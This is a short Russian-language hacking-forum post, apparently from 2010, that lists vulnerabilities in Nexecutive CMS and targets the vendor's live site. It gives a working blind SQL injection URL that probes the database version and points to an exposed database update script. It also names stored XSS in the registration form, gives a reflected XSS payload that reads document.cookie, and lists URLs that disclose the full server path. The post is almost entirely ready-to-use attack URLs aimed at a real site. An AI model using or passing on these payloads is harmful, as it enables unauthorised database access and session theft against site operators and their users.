25.10.2010, 02:51
|
|
Участник форума
Регистрация: 06.01.2010
Сообщений: 136
Провел на форуме:
568388
Репутация:
87
|
|
Nexecuttive CMS
офф сайт: http://nexecutive.de/
SQL Injection:
Код:
Code:
http://nexecutive.de/glossar.php?i=glossary&g=showDef&categoryID=16+and+substring(version(),1,1)=3
(3.23.58-log) -версия.
Можно делать UPDATE:
Код:
Code:
http://nexecutive.de/update_nexecutive_db.php
Активная xss:
При регистрации, почти все поля.
Код:
Code:
http://nexecutive.de/index.php?i=register&languCode=de
Пассивная xss:
Код:
Code:
http://nexecutive.de/cms-shop.php?i=nexec_detail&ktID=33&categoryID=48">alert(document.cookie)
и во многих других местах
Путь:
Код:
Code:
http://nexecutive.de/spaw2/dialogs/dialog.php
http://nexecutive.de/logIn_openID.php
http://nexecutive.de/nexeclib/geomarkers.php
http://nexecutive.de/admin_modul/admin_admin.php
http://nexecutive.de/spaw2/spaw.inc.php
|
|
|